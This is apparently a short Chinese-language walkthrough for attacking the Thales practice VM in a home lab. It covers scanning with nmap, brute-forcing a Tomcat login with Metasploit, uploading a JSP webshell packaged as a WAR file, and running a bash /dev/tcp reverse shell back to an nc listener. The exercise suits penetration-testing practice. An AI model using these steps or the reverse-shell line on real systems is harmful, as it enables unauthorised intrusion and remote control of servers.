Thales靶机渗透攻略
1.我们将靶机导入virtualbox,将连接方式切换为仅主机(host-only)
2.在kali虚拟机中将网卡设置为桥接模式,桥接至我们的virtualbox
3.开启靶机
4.在kali中扫描端口
arp-scan -l
扫描端口
nmap -o 192.168.56.101
发现开启了22和8080端口
5.我们访问网站的8080端口
6.发现有一个登录框
7.使用msf爆破一下
msfconsole
use 0
show options
set RHOSTS 192.168.56.101
run
这里我们扫描到了登录信息,并进行登录
8.登录后我们发现有一个上传war包的位置
9.首先我们使用哥斯拉生成一个jsp木马并保存到1.jsp,然后将1.jsp文件压缩为123.zip,修改后缀为war文件,上传
10.我们可以看到war包上传成功
11.我们访问一下生成的1.jsp文件
12.复制文件绝对路径,到哥斯拉中去连接
连接成功!
13.在kali中开启监听 nc -lvvp 8888
哥斯拉中执行反弹shell代码 /bin/bash -c 'bash -i >& /dev/tcp/192.168.56.102/8888 0>&1'
14.在kali中成功监听!!